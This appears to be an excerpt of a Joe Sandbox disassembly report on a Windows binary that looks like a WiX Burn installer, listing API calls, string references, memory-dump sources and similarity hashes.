• Instruction ID: ac9e10d72f35a7fd0555d595ccefb0cd5f82a9fa6c5e4d56342c906e5f8355e8
• Opcode Fuzzy Hash: c9ed09e548ce2752b81814411a01f0cf9da1d429140826072f69b3e4633ca427
• Instruction Fuzzy Hash: 31F0AF72300708AFD7609EAAEC99E9773ACFB99761700442EBA01C3680DB78ED058770
APIs
• GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 00801CB3
• GetLastError.KERNEL32(?,007C49DA,00000001,?,?,007C4551,?,?,?,?,007C5466,?,?,?,?), ref: 00801CC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
• API String ID: 199729137-398595594
• Opcode ID: 4edaf370546cc965c1eb4c3904c19d4d2fefc0ae8bf4f732f5e683eeb6c074e5
• Instruction ID: 374e0a19dca16f3b5410c3ed8b977abbc0ad7786eebda93835c584cb7d5eb46b
• Opcode Fuzzy Hash: 4edaf370546cc965c1eb4c3904c19d4d2fefc0ae8bf4f732f5e683eeb6c074e5
• Instruction Fuzzy Hash: 7601D636A81636A7EB7216A56C0DF166684FB20BB1F014126BD01EB3D0D728DC80C6D5
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007F490E,00000000,?,007F48AE,00000000,00827F08,0000000C,007F4A05,00000000,00000002), ref: 007F497D
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007F4990
• FreeLibrary.KERNEL32(00000000,?,?,?,007F490E,00000000,?,007F48AE,00000000,00827F08,0000000C,007F4A05,00000000,00000002), ref: 007F49B3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 7615d7758f1d5d0109493a091fda6859a66b0a72873def298143950e8b1a982d
• Instruction ID: b4a1f507b0a8fd814f5eb7496db07532e1f544530ee246d03aa619a031ff3723
• Opcode Fuzzy Hash: 7615d7758f1d5d0109493a091fda6859a66b0a72873def298143950e8b1a982d
• Instruction Fuzzy Hash: 8FF06231A1021CBBCB159F94DC59BAFBFB8FF04711F504069F905A2250CBB95E80CB91
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C21F2
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C21FE
                                                                                                                                                                • Part of subcall function 007C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BDB
                                                                                                                                                                • Part of subcall function 007C3BD3: HeapSize.KERNEL32(00000000,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BE2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                              • String ID: strutil.cpp
                                                                                                                                                              • API String ID: 3662877508-3612885251
                                                                                                                                                              • Opcode ID: d99c2b448acd6a95a91d6cc48162f4148116c3bd3854748fac14deb89726ee72
                                                                                                                                                              • Instruction ID: 0cbbde06e81e4df580cbd5b6bdec5a08da61c0d9b6c0d1e208b78ec5e1dcb154
                                                                                                                                                              • Opcode Fuzzy Hash: d99c2b448acd6a95a91d6cc48162f4148116c3bd3854748fac14deb89726ee72
                                                                                                                                                              • Instruction Fuzzy Hash: FB311A32600226ABD7208EA5CC44F6B3B99BF05774B22422CFD15DB292EB79CC0297D0
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 008095D5
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 00809610
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 0080962C
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 00809639
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 00809646
                                                                                                                                                                • Part of subcall function 00800FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,008095C2,00000001), ref: 00800FED
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close$InfoOpenQuery
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 796878624-0
                                                                                                                                                              • Opcode ID: cd373e8cce042c8f6c65d79ab09e5c0aad7717ab40db149df9bcf0bbac30c5fe
                                                                                                                                                              • Instruction ID: 94b3bf70ff0b2075c6ec28b58e8556c1b6cf6ab1414988456f6d3212494ae11c
                                                                                                                                                              • Opcode Fuzzy Hash: cd373e8cce042c8f6c65d79ab09e5c0aad7717ab40db149df9bcf0bbac30c5fe
                                                                                                                                                              • Instruction Fuzzy Hash: D9416072C0162DFFCF61AF94CD819ADFBB9FF24750F11416AE960B6162C7324E509A90
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,007C8BC8,007C972D,?,007C972D,?,?,007C972D,?,?), ref: 007C8A27
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,007C8BC8,007C972D,?,007C972D,?,?,007C972D,?,?), ref: 007C8A2F
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,007C8BC8,007C972D,?,007C972D,?), ref: 007C8A7E
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,007C8BC8,007C972D,?,007C972D,?), ref: 007C8AE0
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,007C8BC8,007C972D,?,007C972D,?), ref: 007C8B0D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString$lstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1657112622-0
                                                                                                                                                              • Opcode ID: c01ae2ff19227f8aec305bff570b3fd21f04f8cb592acebb255410a7fb296606
                                                                                                                                                              • Instruction ID: 1e26238c65cf470a2b6649bfc828b5c79bdf4be7ba9f8ce5ae46e417a71d25ad
                                                                                                                                                              • Opcode Fuzzy Hash: c01ae2ff19227f8aec305bff570b3fd21f04f8cb592acebb255410a7fb296606
                                                                                                                                                              • Instruction Fuzzy Hash: 81314472600108FFCB518F58CC45FAE3F6AFB48390F15841EF91987210CA799D90DB92
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(007C53BD,WixBundleOriginalSource,?,?,007DA623,840F01E8,WixBundleOriginalSource,?,0082AA90,?,00000000,007C5445,00000001,?,?,ET|), ref: 007C74C3
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(007C53BD,007C53BD,00000000,00000000,?,?,007DA623,840F01E8,WixBundleOriginalSource,?,0082AA90,?,00000000,007C5445,00000001,?), ref: 007C752A
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get value of variable: %ls, xrefs: 007C74FD
                                                                                                                                                              • WixBundleOriginalSource, xrefs: 007C74BF
                                                                                                                                                              • Failed to get value as string for variable: %ls, xrefs: 007C7519
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
                                                                                                                                                              • API String ID: 3168844106-30613933
                                                                                                                                                              • Opcode ID: 866bbabbb087ebe0cb00df68c78ba67cd2aa76877e2f34934f92c1d8130bdd8c
                                                                                                                                                              • Instruction ID: 815e32a403a7e1c1fab7278d2080ecca5e4be0badf43271890d71f9b6ce2dd28
                                                                                                                                                              • Opcode Fuzzy Hash: 866bbabbb087ebe0cb00df68c78ba67cd2aa76877e2f34934f92c1d8130bdd8c
                                                                                                                                                              • Instruction Fuzzy Hash: 01018832944128EBCF269E54DC09F9E7B68EF00361F104168FD04EA220CB3A9E20EAD0
                                                                                                                                                              APIs
                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,00000000,?,007ED148,00000000), ref: 007ED16D
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,007ED148,00000000), ref: 007ED179
                                                                                                                                                              • CloseHandle.KERNEL32(0080B518,00000000,?,00000000,?,007ED148,00000000), ref: 007ED186
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,007ED148,00000000), ref: 007ED193
                                                                                                                                                              • UnmapViewOfFile.KERNEL32(0080B4E8,00000000,?,007ED148,00000000), ref: 007ED1A2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$FileUnmapView
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 260491571-0
                                                                                                                                                              • Opcode ID: 95e98d6c9333383026e2381cb0e319fa0efaa7e2d65cc2a3a95b1c3d8fae61a1
                                                                                                                                                              • Instruction ID: 9f47132a92f7a8906a1440a30227c584e681724ee305e840e81fcb019bd39546
                                                                                                                                                              • Opcode Fuzzy Hash: 95e98d6c9333383026e2381cb0e319fa0efaa7e2d65cc2a3a95b1c3d8fae61a1
                                                                                                                                                              • Instruction Fuzzy Hash: B501F676502B59DFCB31AF66D88081AF7EABF55711316C93EE1A652930C375AC90CF40
                                                                                                                                                              APIs
                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00808820
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0080882A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$ErrorFileLastSystem
                                                                                                                                                              • String ID: clbcatq.dll$timeutil.cpp
                                                                                                                                                              • API String ID: 2781989572-961924111
                                                                                                                                                              • Opcode ID: 2987f5ae315cbef6b3d9c215a4fbcc8049d0d11d9e244d17e0a9842ea6f5b5c9
                                                                                                                                                              • Instruction ID: f64c94fe6f9de7ede66105d111512e549a3a264659511c7228384a81f1c23174
                                                                                                                                                              • Opcode Fuzzy Hash: 2987f5ae315cbef6b3d9c215a4fbcc8049d0d11d9e244d17e0a9842ea6f5b5c9
                                                                                                                                                              • Instruction Fuzzy Hash: D041D376A0021AE6D7609BB88C45B7F7765FF50700F648539A641F72D4EE35CE8087A1
                                                                                                                                                              APIs
                                                                                                                                                              • VariantInit.OLEAUT32(000002C0), ref: 008036E6
                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 008036F6
                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 008037D5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Variant$AllocClearInitString
• String ID: xmlutil.cpp
APIs
• RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,007E8E1B), ref: 00800EAA
• RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007E8E1B,00000000), ref: 00800EC8
• RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,007E8E1B,00000000,00000000,00000000), ref: 00800F1E
Strings
Similarity
• API ID: Enum$InfoQuery
• String ID: regutil.cpp
APIs
  • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
• RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,007E8E57,00000000,00000000), ref: 007E8BD4
Strings
• Failed to ensure there is space for related bundles., xrefs: 007E8B87
• Failed to open uninstall key for potential related bundle: %ls, xrefs: 007E8B43
• Failed to initialize package from related bundle id: %ls, xrefs: 007E8BBA
Similarity
• API ID: CloseOpen
• String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,007C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B8), ref: 007C3B33
• HeapReAlloc.KERNEL32(00000000,?,007C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B8,000001C7,00000100,?,80004005,00000000), ref: 007C3B3A
  • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
  • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
  • Part of subcall function 007C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BDB
  • Part of subcall function 007C3BD3: HeapSize.KERNEL32(00000000,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BE2
• _memcpy_s.LIBCMT ref: 007C3B86
Strings
Similarity
• API ID: Heap$Process$AllocAllocateSize_memcpy_s
• String ID: memutil.cpp
APIs
• GetLastError.KERNEL32 ref: 00808991
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008089B9
• GetLastError.KERNEL32 ref: 008089C3
Strings
Similarity
• API ID: ErrorLastTime$FileSystem
• String ID: inetutil.cpp
APIs
  • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
• RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,007D3FB5,feclient.dll,?,00000000,?,?,?,007C4B12), ref: 007D3B42
  • Part of subcall function 008010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0080112B
  • Part of subcall function 008010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00801163
Strings
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
APIs
• lstrlenA.KERNEL32(007E12CF,00000000,00000000,?,?,?,00800013,007E12CF,007E12CF,?,00000000,0000FDE9,?,007E12CF,8007139F,Invalid operation for this state.), ref: 00800776
• WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,00800013,007E12CF,007E12CF,?,00000000,0000FDE9,?,007E12CF,8007139F), ref: 008007B2
• GetLastError.KERNEL32(?,?,00800013,007E12CF,007E12CF,?,00000000,0000FDE9,?,007E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008007BC
Strings
Similarity
• API ID: ErrorFileLastWritelstrlen
• String ID: logutil.cpp
                                                                                                                                                              APIs
                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,007C523F,00000000,?), ref: 007C1248
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007C523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 007C1252
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ArgvCommandErrorLastLine
                                                                                                                                                              • String ID: apputil.cpp$ignored
                                                                                                                                                              • API String ID: 3459693003-568828354
                                                                                                                                                              • Opcode ID: cb66b542b7c53ae5f7225c1b584dc9ad8be874f32ece18e50c96602866d42e0e
                                                                                                                                                              • Instruction ID: 1bd9514eed09a4901289cf8ceace174b687efdc196d0278d4f0f1c636248c427
                                                                                                                                                              • Opcode Fuzzy Hash: cb66b542b7c53ae5f7225c1b584dc9ad8be874f32ece18e50c96602866d42e0e
                                                                                                                                                              • Instruction Fuzzy Hash: 7611907AA01129EBCB21DB99CC05E9EBBA8FF05750F4141ADBC00E7251D735DE00DAA0
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,007ED3EE,00000000,00000000,00000000,?), ref: 007ED1C3
                                                                                                                                                              • ReleaseMutex.KERNEL32(?,?,007ED3EE,00000000,00000000,00000000,?), ref: 007ED24A
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate memory for message data, xrefs: 007ED212
                                                                                                                                                              • NetFxChainer.cpp, xrefs: 007ED208
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                                                              • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
                                                                                                                                                              • API String ID: 2993511968-1624333943
                                                                                                                                                              • Opcode ID: df5329993d7eac6bc8ff7b0767781c8564f5421a5cc508ba99ce487418cdda4b
                                                                                                                                                              • Instruction ID: 5200ad995f33a39a0a2593817e2c7a6cee71c3f826eec51935d8d4941e7e274a
                                                                                                                                                              • Opcode Fuzzy Hash: df5329993d7eac6bc8ff7b0767781c8564f5421a5cc508ba99ce487418cdda4b
                                                                                                                                                              • Instruction Fuzzy Hash: DD118FB1201215EFCB159F68E885E59B7F8FF49724B104168F9149B391C775AC10CBA4
                                                                                                                                                              APIs
                                                                                                                                                              • FormatMessageW.KERNEL32(007C428F,007C548E,?,00000000,00000000,00000000,?,80070656,?,?,?,007DE75C,00000000,007C548E,00000000,80070656), ref: 007C1F9A
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007DE75C,00000000,007C548E,00000000,80070656,?,?,007D40BF,007C548E,?,80070656,00000001,crypt32.dll), ref: 007C1FA7
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,007DE75C,00000000,007C548E,00000000,80070656,?,?,007D40BF,007C548E), ref: 007C1FEE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                              • String ID: strutil.cpp
                                                                                                                                                              • API String ID: 1365068426-3612885251
                                                                                                                                                              • Opcode ID: 2d43f39d750bed66eed81401e8612ebec7647501403027abba10928e8cab12fb
                                                                                                                                                              • Instruction ID: 165d90b4842e8e0ca9f352230cb14302fb96d3cf10c5f76c4da1d48f984e6164
                                                                                                                                                              • Opcode Fuzzy Hash: 2d43f39d750bed66eed81401e8612ebec7647501403027abba10928e8cab12fb
                                                                                                                                                              • Instruction Fuzzy Hash: 19015BB690112AFBDB219F94CC09EDEBBACEB05750F11416DBD14E6251E7389E009AE0
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 007D0791
                                                                                                                                                              Strings
